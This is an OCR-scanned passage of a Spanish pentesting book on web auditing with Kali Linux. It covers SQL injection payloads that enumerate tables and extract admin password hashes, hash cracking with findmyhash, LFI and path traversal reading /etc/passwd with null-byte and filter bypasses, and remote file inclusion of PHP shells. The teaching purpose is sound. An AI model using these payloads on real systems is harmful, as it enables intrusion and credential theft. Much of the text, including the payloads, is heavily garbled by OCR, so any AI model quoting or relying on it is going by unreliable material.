1  ntoi  l  hm  d  eomfMf  Iff : 


•  KAL 


BT 


BT  VS  KALI 

inducin'? 


itiu%  ra  -uoi  o  s-> 
0%  (£  wtoi) 


Tnvcilftvlo  ' |jt  Vo Ihi  |mh  5MS 

K*  .1  uniki.li'i  J  ii  ri  a  I.U4, 


3 


Imagen  05.12:  CSRF  en  sistenia  de  votadones. 


I 
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Rentes  ring  con  Kali 


SQL  Injection  H 

Las  vulnerabilidades  6c  SQL  Injection ,  afectan  a  todas  las  aplieaciones  web  que  reseatan  informacicn 
de  una  base  de  dates  mediante  parametros  mal  filtrados.  Estas  lecnicas  de  inyeceion,  afectan  a  todo 
tipo  de  bases  de  dates,  como  Microsoft  SQL  Server,  MySQL,  Microsoft  Access,  Oracle,  PostgreSQL 
o  Sybase  entre  las  mas  comunes. 

Las  bases  de  dates  MySQL  al  ser  las  mas  ulilizadas,  ban  ido  recolectando  diierentes  tecnicas  de 
aiaque  como  las  conocidas  Blind,  inyccdones  basadas  en  aritmetica,  en  tiempo  de  respuesta  o  en 
errores. 


Para  llevar  a  caho  este  tipo  de  inyecciones,  es  conocida  la  inclusion  de  una  com  ilia  simple  en  los 
parametros  a  reeoger,  con  ei  objetivo  de  forzar  un  error  de  sintaxis  SQL ,  y  provocar  asi  que  la 
pagina  devuelva  algun  tipo  de  error  en  pantalla.  Como  no  todos  los  servidores  tienen  la  ope  ion  de 
display  ermrs  habilitada,  otras  tecnicas  como  comparaciones  matematicas  “and  1  -  I "  y  el  esperado 
canibio  del  HTML  de  la  pagina  devuelta  con  “and  1=2’\  posibilitan  la  oportunidad  de  deteciar  un 
SQL  Injection  sin  apenas  diflcultad. 


Para  exponer  un  ejemplo  practice  basado  en  una  comparacion  logica,  la  herramienta  Comparer 
de  Burp  Suite ,  puede  ser  utilizada  para  buscar  palabras  modificadas,  agregadas  o  eliminadas  cm  a 
varias  peticiones,  Con  lo  que  la  difcrencia  entre  “and  1-F  y  “and  l=2*\  muestra  un  posible  campo 
a  la  visla. 


Imagen  05,13:  Comparer  en  Burp  Suite. 


Tras  la  busqueda  de  colunmas  existentes  mediante  “ORDER  BY'\  tan  solo  sc  encontro  una.  Lste 
campo  imprimihle  ubicado  en  el  titulo  de  la  pagina.  ha  side  milizado  para  identificar  con  facilidad 
desde  el  huscador  de  la  herramienta  Repeater  en  Burp  Suite ,  la  palabra  “SQLf  inyectada  en  el  valor 
a  recoger  Desde  este  campo  sera  posible,  extraer  intbrmacion  dependiendo  del  nivel  de  privilege 
con  cl  que  se  ejecute  la  consults.  Es  necesario  revisar  el  codigo  HTML  de  respuesta,  debido  i 
que  d  titulo  no  es  visible  en  el  ctierpo  HTML  del  navegador  y  la  utilizacidn  de  Burp  Suite  facility 
enormemente  csta  tarea. 


Existen  diferentes  fundonesnalivas,  lascualespueden  resultar  utiles  para  llevar  a  cabo  laexplotacion  i 


de  la  vulnerabiiidad. 
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i 


=  ^  I  P^r^rriE  He*d«rs 


in.,1 


GET  !fpagini.pKp?id=-^4'unicin+,sfil*ct+fSQLfi-  ■  HTTP/Ll 
H  o  it 

U**r  Ag«nt.  MBH.Ha/VQ  (XI 1.  Linu*  iOBS;  rv:19,03  Gscko/20100101  Firefo^li.O  Ictwaa  1*1/18.0.1 


c. 


|  +■  J  i  *  j  ?ip* 


a  M^irc^j  tct-ir) 


0  mate  Kb* 


Bi^^jonEc 


i  fl*w  1 


Header* 


h«h  •  -owl  1  Render 
■  *  1 - 


«l!DOCTYPE  htm!  PUBLIC  VA V3C//DTD  XHTML  L  O  TrBn&mnat/JEN* 

*  http  :J/*nvw.  w3.org/TR/Hbtmll/DTD/xhiTinll  >transitiond.dtdn  > 

<  ht  mi  xm  I n  s = Hhtt  p  :/Auww  ,w3  .o rqj  1 99  S/xhtm  I  *> 

<head> 

<met&  http  equiv-“Ct3nte-rit-Typeli  cQittanl-taxt/htmi:  charset=iso  3859  r  f> 
<Liile>IPotos  SQU</t-tle> 


* 

1  match 


Done 


Length  6.115  1154  miHis) 


Imagen  05. 14:  lmprirmendo  SQLi  cn  el  1 ITML. 


Sera  posible  realizar  la  extraction  de  la  version  do  MySQL  con  la  funeion  @@version  o  vers  ion  (J. 
Esta  sera  parlicularmente  muy  importante,  debido  a  que  el  paso  de  version  4  a  5  en  MySQL,  supuso 
un  cam  bio  a  la  hora  de  realizar  los  aiaques  dentro  del  6mbito  de  auditoiia  Web.  Esto  es  debido  a  que 
depend  iendo  de  si  la  version  pertenece  a  la  4.x  o  an  ten  ores,  los  ataques  a  las  tab  las  y  columnas  de 
la  base  de  dates,  se  realizaran  por  fiierza  bruta.  En  cambio  si  la  version  es  a  partir  de  la  5.x,  existira 
una  tabla  llamada  Information  Schema,  la  cual  almacenara  informacion  de  todas  las  bases  de  datos, 
desde  la  que  se  podra  extraer  informacion  siempre  y  cuando  se  posea  el  privilegio  necesario.  De  la 
misma  manera,  la  extraccibn  del  usuario  dc  la  base  de  datos  se  realizaria  con  la  fiincion  current  user 
o  userQ  y  el  nombre  de  la  propia  base  de  datos  con  datahaseQ . 

La  siguiente  imagen  muestra  una  supuesta  Botnet  vulnerable  a  SQL  Injection,  en  la  que  mediante 
la  seniencia  UNION  SELECT ,  se  encontro  un  campo  imprimible  de  entre  los  cuatro  existentes, 
utilizado  para  extraer  el  usuario  de  MySQL. 


Request 

s^l  Param* 


Headers 


Hex 


1 


GET  /pnjefaaSi|lsqli/sqSi.php7ids  H-union+se!act4-  l,Zru&er(Tfl  HTTP/1.1 
Host:  4n0nym0us 

User-Agent:  Mozilla/5.0  (xili  Linux  jSBS:  rv:18  0)  G#clto/ZQloai01  Firefox/iB.G  Iceweasel/IB .0.1 

;  Type  a  search  term 


Response 


ftdW 


HietlCJ*  |  Ha* 


I 


l 


HTML  Render 


<html> 

<fomn  tction^  "sqkphp'  methpd“'qet">Doftiinio«;  *m 

rsotfiliDCiilhoftt 

<br> 

cbr> 


i  i_?J  L 1  •  *3 


Darre 


Length  436  (1  619  mlllia) 


Imftgen  05.15:  Usuario  root  de  ta  bust  de  da  los. 
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Pen  testing  con  Kali 


Si  el  auditor  utilizase  ia  raisma  comprobacion  pero  en  este  case  para  extraer  ia  version  yj 
dispoiidria  de  la  suficienle  mformaeidn  como  para  evitar  z\  fuzzing  y  realizar  consultas  a  las  labt  ^ 
de  Information  Schema.  La  siguienle  imagen  demuestra,  como  es  posible  extraer  d  nombre  de  | 
tab  las  de  la  base  de  dates  utilizada  por  el  desarrollador,  para  realizar  la  consulta.  Concatenando  |0$ 
resultados  de  la  query*  con  group  concat  y  seleccionando  el  nombre  de  fa  base  de  daios  desdc  |l)  qUc 
extraer  la  informacion. 


ir*rflm«  *+e*dEri 


GET 


=■= 


/pru  a  ba  5/5  ql  tfs  qli  ph  pi  id  =  . +u  mor,^  5  a  lect  +1,1. 1  select + grou  p.rconc  at  £i  ab!  o  mam eifro  m+ in+&r  matiDn  _ 
bthaina  f.ab!-i5-*-whBre+Lable_5rhema^dal abased], 4--  HTTP/]  1 
Hast.  4n0nyrnQy5 

Utflf-Aqefrt  Mndb/5.0  1X12.  Linux  .506;  rv.10.0j  GedtoPOlOOLQl  Firefim/lB.0  lc«W«aulAe , Q ,  1 


«=  -  J  t  j  !  \Ti  |.'f  .>  Tn~*rr*  r,r,i 


0!  matthci 


IUvi  Hsaserj 

<*rtnnl> 


<ftrm  icfmn  -  lsgh  php*  methaa- "ger“>  Daminias  en  Rotnet'^/foffn:1- 

■alert  tr  ale  rt  sc  onfi  g,  d  at  ad  om  ai  n  s,  rfri  «  v  dam  a  i  ns,  forms,  tp2  C,  pay* 0  *■  U  5  e  rs,  Z  om  b  lea 

<br> 


— 

1 


-  -  *i 

R»*dy 


flj-  miUha* 


UsnatK  LI  056  m  ll  il 


Imagen  05, 16:  Ejttraoei6ii  de  tabtas  con  SQL  Injection. 


Se  ha  acudido  a  la  funcion  nativa  para  realizar  una  evasion  en  caso  de  que  el  PHJ\  luviese  habiliuidas 
las  magic  quotes,  pues  el  nombre  de  la  base  de  daios  se  incluye  entre  comillas.  E!  siguiente  p:iso 
para  un  auditor,  seria  la  extraccidn  de  eolumnas  de  entre  las  tablas  mas  sensible#:  la  de  usuarios. 
Para  realizar  la  consulta  con  el  fin  de  extraer  las  eolumnas  de  la  tabla  users,  seria  importante  pensar 
mievamente  en  la  evasion  a  las  magicquotes,  con  lo  que  en  esle  caso  al  no  eontar  con  funciones 
nativas,  SQL  implementa  codificaeiones  conocidas.  Pasar  nombres  a  su  equivalente  CharCode  o 
hexadecimal,  evitara  las  comillas  simples  enla query.  Para  realizar  codificaeiones, Burp  Suite  tambien 
provee  al  auditor  de  la  herramienta  Decoder,  esta  incorpora  las  codificaeiones  mas  conocidas.  La 
siguiente  imagen  muestra  la  utilization  de  dicha  herramienta.  con  el  nombre  de  la  tabla  users. 


imagen  05. 1 7:  Decoder  de  Burp  Suite. 


jlula  y  Auditoria  de  aplicaciones  Web 


147 


i  „iA  h  consults  seria  simitar  a  la  mostrada  con  la  extraecion  tie  tab  las,  pero  en  este  caso  las 

-ii  10 

c0|umnas  de  users. 

-wrrr^r 


F«r«mi  1  Hfiiden  [  He* 

•  '  L  — ..  .  — , 


Mrueb  at/xqli/0  qj  i .  p  h  p  7 1  d  =  1 + un  ro  n + s  e  I  e  ct +l,2,ttilttf+grpup_c  one  at  (col  umn_nam*)from + 1  nfbrmatlG 
r  schems  totumns+wh-ere+table_niame=0>r7S73^ri7  ?73),4-  HTTP/1. l 
Host  4nOnym0us 


Host  4nonymuus 

User-Agent:  Mozilla/5.0  (Xll;  Lmux  iflflS;  rv:lB.O]  Gecko/201Q01Q1  RrafoK/lGQ  kewfiasel/lB.O.l 
I  7  1  l  ■<  in  +  |  |  >  ;  '  TVpe  a  search  term 


Q  matches 


Mesponsp 


chtml> 


Heiflars  •  Hex  .HTML  Render 


mn 

<form  actior=“5qlr.php"  method-  get"> Dominies  en  Botnet: 

jseiypassword 

<bf> 


!«;  V 

•  ji 


hnagen  G5JS:  Extraccion  de  columnar  con  SQL  Injection. 


Tan  solo  dos  eolumnas  separarian  al  auditor,  de  los  usuarios  y  sus  respectivos  hashes  para  hacerse 

con  el  conirol  de  la  Botnet. 

I'am  lualizar  los  listados  del  contenido  de  las  columns*,  es  posible  agregar  caracteres  de  sal  to  de 
linea  y  separadores,  con  objeto  de  acomodar  los  resukados. 


R«quc»*t 


GET  ,'Tjru^bri  vj’sqlifsqli  t'hp?id=  1  <  unipn  I  select  +  1 .2  .<  &e-<e  ct + gre  up_C  one  at  t  u  s « r  (0)«2D!.pi?JW»ri:  UuUA})hpn  !+us*rs  J  ft-  HTTPfi.i 

Hn^rt:  anonymous 

u s er - Aq errt  MG* il la/5  O'  (XL1;  Linux  i<»06;  rv:10  O)  Gee k*/20 ID 0 ID l  Frref oxf  18  a  i ceweasel^ IS. 0.1 

L_L:  l_fj  ^  *  J  »  pjjpe'aag.  -  tnrm 


0  ma'ch 


(Response 


Header* ~[  Het  '  HTML  [  Hangar 


crorm  actipn-'^qlj.php11  method- NgeCn>Do!minips  en  Botnettc/form: 

4drnin-elQAdc3q49b359abbeS6eO57f2Ote03c 
a  d  min2 -e  i  &a  d  1 1 949  ba  5  ^  a  bb*5  b  eO  5  7  f20  f  68  3  e 

?  ^  ‘  I  +  |  |  *_j  7tpe  a  sejrcfi  fern? 


'T- 


A  match 


Images  05.19:  Extracci6n  de  valorem  eon  SQL  Injection. 

Hac* 

una  pequefta  alusion  al  cracking  de  hashes M  nada  tan  usual  conio  la  utilizaei6n  de 
Rentas  online  como  esta  que  Kali  Linux  esconde  tras  el  menu  de  A  tuques  a  Cantraseiias  > 
con  ^  'onexion  >  Findmyhash , 

^^i6n  provee  al  auditor  de  la  posibilidad  de  aumentar  las  Rainbow  Tables  de  forma  online, 
JftntoTl  °.Servidores  con  en^rmes  listas  de  hashes.  Incluyendo  los  parametros  con  el  tipo  de  cifrado 
®?ifeinal  ^  herramienta  busca  cn  diferentes  paginas  mostrando  en  algunas  ocasiones  el  string 
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^estingcon^ 


root$lk*li:  “ 


•*.i  •: hi  •».•  Editor  Vw  Bir.»*cir  T^murial  Ayud^ 


f  -d  ■  :-#  /usr/bin/flndmyhash  M05  -h  GlGadc3949bs59abbir56©057f2efB03B 

Cracking  hash:  Ql0adc3949ba£9flbbG56&05?f20f883Q 

Analyzing  with  nicenamecrew  (http://trac1tfoo.nicenainQcrM.eDh)... 
hash  not  found  in  nicenaftiec  row 

%  ... 

Analyzing  with  joanslaaa  (http://JciQnilaaa.com)... 

.  .  hash  not  found  in  jooifilaaa 

Analyzing  with  md5 -lookup  (http  ://md5 'lookup. com),  * * 


*****  HASH  CKACKED  !  !  ***** 
The  original  string  is:  1234 


The  following  hashes  were  cracked: 


e 1 0adc 3949baS9abbeS6a057f 20f003e  ->  123456 


i ooiMk.ii ; 


EEffiaB  U0C3QD 


Imitgcn  05.20:  Findmyhash  entiientra  la  string  123456, 


Local  File  Include/Path  Transversal  n 

Esta  vulnerabilidad  permite  la  inclusion  de  ficheros  locales,  desde  una  aplieacion  que  manejc 
archives  mediante  un  parametro  sin  filtrar.  Adernis  en  algunos  casos,  es  posible  la  ejecucion  de 
cod i go  remoto  incluyendolo  en  las  cabeceras  de  una  peticion  HTTP,  que  mas  tarde  sera  interpretado 
al  inctuir  los  ficheros  de  log  en  la  pagina  vulnerable  a  LFL 

Es  conuin  cl  uso  dc  funciones  que  perm i tan  la  inclusion  de  archives,  con  lo  que  si  la  recogida  del 
valor  en  una  peticion  reeae  di  recta  men  te  sobre  este  tipo  de  fun  cion,  es  posible  ineluir  cualquief 
flfchero.  En  PHP,  las  funciones  que  dan  pie  a  llevar  a  cabo  este  tipo  de  ataques  son  las  siguiemes. 

include  “fichero”; 

require  “fichero”; 

include  once  “fiehero”; 

-  require  once  4<ficheroui 

i  ii 

I  s  imposible  diferenciar  de  forma  visual  en  algunos  casos.  si  lo  que  recoge  un  parametro  es  ^ 
tidn.  ro  a  un  valor.  Esto  se  debe  a  que  niuchos  desarrolladores  intentan  ofuscar  las  extension^  _ 
los  archives  inctuyendolas  en  el  propio  codigo  de  la  pagina.  El  truco  para  reconocer  esto.  es  inel|Jir 
un  byte  nulo  al  final  del  valor  del  parametro,  siendo  este  %00. 

ii  ’ 

Para  demostrar  esto  ultimo,  en  el  siguiente  ejemplo  practice  se  intentara  llevar  a  cabo  la  extras* 
del  fichero  passwd de  UNIX,  en  el  que  la  deteccion  de  la  extension  es  trivial. 
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CaptwlZ 
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if** 

E— —  rSrs 


Riquest 


Hdram* 


H«idFr« 


EL 


GET  ^ndeK.php7loc=.(/.,/,i.Mc/passwd  HTTP/ll 

Host: 

Jser-A g®nt:  Mozill^S.O  (XII;  Linux  1BB6;  iv:18,Q)  G«cko/20100101  Firefox/10.0  icewea&et/lfl.O  1 
<ij  iMMj  !■  >  I  7V*tf  *  jgjff h  term  _ 

Response 

he*  •  KML, 


Raw 


Head* ft 


<B> Undefined  LOC  („/../.. /../etc/passwdJphp).</B> 


Imagen  05.21:  Detec  cion  de  extension  PHP* 


[nduyendo  el  byte  nulo  en  la  pet ic ion,  sc  rompe  la  extension  que  junto  con  el  descontrol  de 
privileges,  hacen  que  sea  posible  eneontrarse  con  lo  siguiente. 

HF" 


Param?  j  Headers-  j  Mex 


GET  /i  n  de*  <ph  p  ?]  oc  = . ./ . ./ . !/ .  ,/et  c/p  a  5  s  wd%00|  HTTP/ 1 . 1 

Host :  www 

User-Agent:  MoziNa/5.0  (XI 1:  Linux  3686:  rv  18.Q)  GEsckg/2D1001DI  Firefox/IB  0  te«waa§etyI&.Q.l 


7  j  [  <  j  |  HK  j  [  >  j  j  Type  a  Mfarc#t  term 


Response 


Raw 


Ho  a  date  }  Hex  (.fflTjUiL,,  Bonder  [ 


ro  ot :  x :  O;  0 :  ro  ot : /r  o  ot  i /b  i  n/b  *i  s  h 

bln:K:  1:  l:bln:/b|n:/«btn/nolog|n 

tljemofiiK:2:2:daemtm:/sbin:/*bin/nologln 

cidm:x:3:^:adrtit/var/adm:/sblin/nologin 

lp:x:  4: 7dp:/var/spool/lpd:/sbin/nologtri 

■ync:x:5:0:sync:/sbin:/bin/synt 


Imagen  95.22;  Agregsndo  el  byte  nulo  para  romper  extemkmes. 

La  principal  diferencia  entre  el  ataque  de  Local  File  Include  o  LFI  comunmente  de  forma  acorlada 
y  Both  Transversal,  radica  en  la  forma  de  extraccion  de  los  ficheros.  Una  extraccion  en  la  que  el 
fichero  se  embebe  en  la  pagina  o  como  su  propio  nonibre  indiea,  se  incluye,  se  denomina  Local  File 
delude.  En  cambio  si  la  extraccion  del  fichero  es  descargada  sin  pasar  por  el  codigo  de  respuesta  de 
^  Pagina,  se  denomina  Path  Transversal,  Esta  diferencia,  en  algtmos  easos  afecta  a  la  explotacion  de 
L  vulnerabilidad,  debido  a  que  sc  ineluyese  un  fichero  como  por  ejemplo  un  PUP  sobre  la  fiincion 
delude,  este  sera  interpretado  y  daria  lugar  a  la  imposihilidad  de  leer  el  codigo  fuente. 

Un  Cheat  Sheet  util  para  la  extraccion  del  codigo  fuente  en  un  servidor  con  PHPy  con  la  vulnerabilidad 
Pf  seria  el  siguiente  caso: 

pan,r  de  la  version  5.0.0  de  PIil\  se  incorporaron  filiros  de  conversion  para  realizar  codifieaciones 
y  decod  iiicaciones  en  Base64,  Este  filtro  aplicable  con  las  fu  nd  ones  co n vert,  base 6 4 -encode  y 
^m^nJ)ase64 -decode,  puedc  ser  utilizado  para  codifiearen  Base64  el  codigo  PHP  en  uria  peticidn, 
sur  embebido  por  el  include  en  la  pagina  vulnerable.  De  esta  manera el  codigo  fuente  no  serin 
HF^Prfitado  y  seria  facilmente  reversible  para  extraer  cl  con  ten  i  do  de  los  ficheros.  A  continuacion  se 
ig^stra  el  modo  de  empleo  del  filtro. 
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Pentesting  can 


Lmagen  05.23;  Tcxto  codifieado  en  Base64> 


Como  puede  apreciar  en  la  iinagen,  dentro  de  la  pestafia  HTML  sc  muestra  en  la  parte  aha  un 
fragmento  del  codigo  HTML  de  la  paging  incluyendo  una  ristra  de  lexto  codificado  en  Base 64  \  \ 
auditor  tendrfi  la  opcion  de  copiar  el  texto  eodificado  y  Uevarlo  Irnta  la  herramienta  Decoder  de 
Burp  Suite ,  para  m  visualizacion  de  forma  emend  ible. 


Jrntfgen  05,24:  Texto  descent  if  jcudu, 

I  n  algunas  ocasiones,  los  desarrolladores  daboran  fiitros  no  del  todo  acertados,  con  el  objetivo  * 
evitar  la  vulnerabilidad.  fl 

<?php 

$page  =  "  .  /  "  .  $  GET  [  "page "  ]  ;  ' 

if  (subs tr {Spaeje, “6) ^"passwd") {  //si  termina  en  passwd 
die  C'B&eklng  attempt"};  / /muestra  el  error  y  se  termina 
} include ($page) ; 
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I  -jjgQ  pHP,  es  un  filtro  encargado  de  revisar  si  las  seis  ultimas  caracteres  introducidos  en  el 
Pineiro  page  mediante  el  raetodo  GET,  temiinan  cn  la  palabra passwd.  Si  es  delta  la  condicion, 

la  »\ 


plteacion  muestra  el  mensaje  Hacking  attempt  y  finahza. 


J«r.l 


Paramp  H  >se  dec*  Hpa 


1 


QET  ip rueb a s/ltyfiyppa ssLFI  php70flge=  i  /etc/posswd  HTTP/1  1 
Host  dnOrtyrnOut 

User- Agent  MoEtlb/5,-0  EX11,  Unu*  iBStf;  rvilB.Oj  CickWZOlQQlQ  i  F<refox/1B.Q  lce*Ga*<MAG,0.1 
\j  ■*  |  j-  *  H  teni>  r 


j  **  ]_  Headers  j  Hex 


HTTP/ 1 . 1  200  QIC 

Date:  Thu,  04  Apr  2013  14:43  35  GVT 

Server:  ADache/2  .2,11  {Win32)  mGd.,551/2.2  11  OpanSSE/O.&.Sr  PHP/5  2  5 
X-Powe-red-l3y:  PHP/5,2  9 
Content-Longth  15 
Ccntent-Typg:  text/html 

Hacking  Attempt 


Image n  05.25:  Hacking  attempt. 


■  (  oino  realizar  la  evasion?  Es  muy  sencillo.  Utilizaudo  ios  caracteres  para  asignar  la  carpeta 

actual. 


i  Aavi  ]  Perema  ]  headers 

Ha  m  j 

GET  fp ru  eh  a  a/if  i/Byp  passLF  i .  p  hp  7  p  eg  e  = , ,/  M .C/p  as  s  wd / ,  HTTP/ 1 , 1. 

Host:  4n0nym0us 

Ui*r-Agsnt:  MOIil1*/5.0  [XU;  Linux  1686;  rv:10,O)  Gecko/20100101  Firefox/lB,0  lcewBBMl/iflO.1 

LU  l  *  UJ  L?J 

Type  9  « #rxh  term 

Paw  |  Hcadaft  J  HBK  ] 

Date:  Thu,  04  Apr  2013  14:50:40  GMT 
Server:  Apache/2.2-11  (Win32)  mad_ss1/2,2  11  GpenS5L/0.9.Bi  PHP/5.2.S 
X. •  Power ed-Sy:  PHP/5,2,9 
Content-Length.  21 
Content-Type  te*t/html 

ML  fichero  passwdi  :Q 


Imagen  05.26:  Extraccion  del  iexlo:  “Mi  fidiero  passwd!”. 

Otra  de  las  cvasioncs  posibles,  seria  tan  simple  como  introducir  el  byte  nulo  %00,  debido  a  que 
detras  de  la  palabra  passwd,  no  se  encuentra  n ingun  otro  earaeter 

bn  el  codigo  que  se  muestra  a  eontimiacion,  se  demuestra  cornu  existen  eases  en  los  que  se  realizan 

busquedas  eon  diccionarios  de  rutas.  donde  se  alojan  archives  sensible  para  detectar  posibles 

ataques 

<<?Php 

iPSe  -  *. / * .  $  jset  l  "page " )  ; 

** (strpos  ($page, "/etc/passwd")  1  "FALSE M  //si  encuentra  /etc/passwd 
-("hacking  attempt");  //muestra  el  error  y  se  terrains 
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U  tia  de  las  opciones  mas  simples  para  llevar  a  caho  la  evasion  del  filtro,  seria  romper  la  ruta  simul  9 
subir  un  directorio  inexistente  y  bajandolo  de  nuevo  de  la  siguiente  manera.  JJetc/YEAWj0:  fjj 
El  siguiente  ejemplo  muestra  la  explotaci6n  de  la  mencionada  vulnerabilidad. 


lmagcn  05.27;  Bypass  con  subtda  de  directorio  incxisienk. 


Tambicn  seria  viable  para  realizar  la  evasion,  iiicluir  los  earaeteres  del  directorio  actual  "S\  cntrc 
las  ruias  comprobadas  de  la  siguiente  manera,  .JJetc/Jpasswd  o  haeiendolo  mediame  barras  JJ 

etc////passwd 


Remote  File  I  nclude 

Esta  tccnica  permits  la  inclusion  de  ficheros  desde  paginas  extemas.  Sc  deben  cumplir  varies 
requisites  para  la  explotacion  de  la  vulnerabilidad,  entre  otras  cosas  son  importantes  las  version.es 
de  PHP  v  sli  mala  configuracion  en  el  caso  de  permitir  inclusiones  de  ficheros  cxtemos. 

De  la  misma  manera  que  LFI,  esta  vulnerabilidad  en  PUP  es  explotable  desde  funciones  como 
include ,  include  once,  require  y  require  once. 

<?php 

include {$_  GET [ ’url' ] J ; 

include ($_GET[ %url2* ]  .  ^.php^) ; 

?> 

El  primer  parametro,  trataria  de  incluir  una  pagina  externa  sin  ningun  tipo  de  filtrado  que  decide 
cuales  son  o  no  las  idoneas.  En  este  caso  la  explotacion  de  la  vulnerabilidad  seria  trivial,  debido  a 
que  si  se  incluyese  una  shell  PUP ,  alojada  en  un  servidor  extemo  con  cualquier  tipo  de  ex  tens  id11’ 
interpretaria  el  eddigo  y  seria  vulnerada. 

I  I  segundo  parametm  del  eodigo  uri2,  mcluye  la  extension  “php"  al  final  de  la  wr/,  con  !o  queen 
este  caso  a  diierencia  del  byte  nulo  del  anterior  ataque  LFI,  se  incluira  el  caracier  4A#*f  codifieatfo 
er  uriemode  “%23'\  para  evitar  que  se  entienda  como  un  salto  HTML-  Tambien  es  posible  l* 
utilizacion  del  caracter  “T\  para  provocar  la  exclusion  de  lo  que  eontiene  a  la  derecha  del  misuiu- 
La  siguiente  captura  muestra  la  explotacion  de  esta  vulnerabilidad. 
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Image n  05.28:  Utilization  del  caracter  ’*#"  codificado. 


3.  Aplicaciones  de  seguridad  web  en  Kali 

Dentro  de  Kali  Linux ,  se  eneuentran  multitud  de  herramientas  que  le  serviran  al  auditor,  para  facilitar 
d  trabajo  de  los  ataques  manuales  vistos  con  anterioridad. 

1  as  huTu i nientas  Proxy  que  Kali  provee,  incorporan  no  solo  tunciones  dc  intercept  ion  de  pcticion.es 
Como  sc  ha  visto  en  este  capitulo,  sino  tambien  metodos  de  eseaneres  pasivo  v  activo  para  facilitar 
ht  delcccion  de  vulnerabilidades,  ademas  de  herramientas  Spider  y  la  posibilkdad  de  Lrabajar 
conjuntamente  eon  las  herramientas  del  apartado  de  explotacion. 


Aplicaciones  Proxy 

Dentro  del  apartado  de  Aplicaciones  Prox\\  se  eneuentran  las  herramientas  Bmp  Suite,  Paws, 
P^xy Strike,  Vega ;  WebScarab  y  Zaproxy .  Todas  estas  herramientas  induyen  funcionalidades 
interesantes,  v  son  las  mas  llamativas  para  la  mayoria  de  los  usuarios  de  Internet,  siendo  el  resto 
Berios  usadas,  antique  no  por  ello  dejan  de  ser  utiles. 

&urP  Suite  con  lieencia  comerciaL  incluye  uno  de  los  eseaneres  de  vulnerabilidades  mas  potentes 
^asta  lecha,  ckro  que  la  alteniativa  gratuita  preferida  por  muchos  Zaproxy ,  no  deja  indiferentes 

a  auditors. 


asi  politicas  de  escaneo  de  Zaproxy,  se  dividen  en  secciones  dependiendo  del  tipo  de  categoria  de 
i\>r  defecto,  trae  habilitadas  conocidas  teenicas  de  inyeecidn  mencionadas  en  este  capitulo. 
I^re  °lras  eosas,  intenta  la  deteccion  de  vulnerabilidades  Server  Side  Include  (SSI),  la  cual  permite 
^_^eciici6n  de  eomandos  remGtos  sobre  el  servidor  e  inyecc tones  CRLF,  que  permiten  induir 


d  ft  Cres  salto  de  linea  y  retorno  de  carro  en  un  parametm  sin  filtrado  especifieo,  con  el  objetivo 
|  'r  nuevas  lineas  a  la  cabecera  de  una  peticion  HTTP. 
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Politic  a 

t  Plugin  por  cateoorfs 

InVPtdon 

Pnyeccidn 

* 

Mlacelanea 

T est  Name 

|  Actlv. , .  |J 

Mavegador  del  client* 

Server  side  include 

3 

Passive 

Cross  Site  Scripting  (Reflected) 

ftecoptlaaon  de  informaoAn 

SQL  Infection 

3 

Segundad  del  s ervidor 

CRLF  injection 

m 

Parameter  tampering 

3 

-  _  ..  _ 1 

Aceptar  -  •• 


Imagen  05.29:  Politics,  de  inyecciones. 


Otra  de  las  opciones  a  deslaear  dentro  dc  las  poiiticas  de  configuracion  de  Zaproxv,  se  trata  de  i0s 
escaneos  pasivos. 


Estc  tipo  de  busqueda  de  vulnerabilidades  web,  se  basa  principalmente  en  el  parseo  de  petieiones 
y  cddigos  de  respuesta,  que  el  propio  Proxy  se  ha  encargado  de  interceptar  y  almacenar  deniro  de 
su  Idstorial  de  navegacidn.  Vulnerabilidades  basadas  en  la  ausencia  de  flags  seguros  de  las  cookies, 
cabeceras  del  tipo  X-i'rame- Opt  ions  para  evasion  de  Clickjacking,  son  detectadas  con  I'acilidad  t  w 
solo  pasando  las  petieiones  por  el  Proxy. 


T  Pfugln  por  category 
Inyeccion 
Miscelanea 
Navegador  del  clients 


Passive 


PoLftrca 


r 


Passive 


Recopilacion  de  inform acion 
Seguridad  del  servidor 


Test  Name 


Act  iv  a  do  | 


Incomplete  or  no  cache-control  and  pragma  HTTPHeader  set 

Content-Type  header  missing 

Cookie  no  http-only  flag 

Cookie  without  secure  flag 

Cross-domain  JavaScript  source  file  inclusion 

lEB's  XSS  protection  filter  not  disabled 

Secure  pages  including  mixed  content 

Password  Autocomplete  in  browser 

Prrvate  IP  disclosure 

X -Content -Type -Options  header  missing 

X-Frame -Options  header  not  set 


B 

a 


3 

3 

a 

a 

B 

3 

3 


tmagen  05.30:  Escaneo  pasivo. 


\l  lanzar  los  csdmcres,  es  posible  realizar  ta  busqueda  de  vulnerabilidades  encontradas  desdc  l** 
pestafta  de  aierta  dc  Zaproxv, 

A  contimiacidn  se  muestra  un  escaneo  activo  hacia  un  objetivo  vulnerable,  en  el  cuai  se  intent^11 
explqtar  varies  tipos  de  alaqties.  JH 
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Sesi6n  lin  Nornbr*  -  OWASP  ZAP 
£dftar  v*r  Analizaf  informes  Horr-armentM  Online  Ayuda 
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bttp://4nGnymCu  s;pru  ab  b  a/sqll/sqJI ,  chp’  Id  -nttpiflwww.  q  a  tfgl  e ,  com 
htt  p  -M4  nOnym  n  u  s/pru  e  b  a  s/s  q  It/sqih  php 1 1  d  =http:  ffwum  google  come  arch 
htt  p://4n0nymQU  s/pru  ebas/sqli/sql'  php1ld=http -//www.  gocgle.com  BOf&ea  200  OK 
htt  p  ://4n0  nym  Qu  9/pru  eb  as/sq  l*/s  qli.ph  p?l  d=wwvu .  g  a  a  q  le  c  om/ 
htt  pi  //4nO  nym  Qus/pru  e  b  a  sis  qli/s  q  li.  p  h  p?i  d-wvuw  g  0  0  g  l  a .  com:  9  0/ 
htt p://4 n 0 pymOu jp/pcue b es/s ql  1/3 q 1 1  php?Kl=www  gongie.com 
http:  //4  n  □  nymOus/p  rue  bfts/i  ql  i/s  ql  1  php?id“www  google. com/ie«rch?q^O  . 
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Imagcn  053  i:  Lscaner  active. 


Aplicativos  para  fuzzing 

Dentro  de  este  puoto,  Kali  Linux  ofrece  un  numero  amplio  de  heiramientas,  tales  eomo  Burp 
Suite  y  su  Intruder.  Powerfuzzer,  WebScarah,  Webs  layer  Wehsploii,  Wfuzz ,  Xsser  y  Zaproxy.  En 
algimos  casos,  se  eneuentran  aplicaciones  repetidas  de  otros  apartados,  debido  a  la  cant  id  ad  de 
luncionalidades  que  estas  ofrecen. 


Lli  herramienta  Wfuzz  es  una  de  las  herramientas  de  fuzzing  destinadas  a  direetorios,  archives  v 
i>arametros  mas  poientes  y  conocidas  que  brinda  Kali  Linux.  Su  utillzacion  cs  trivial  e  intuitiva 
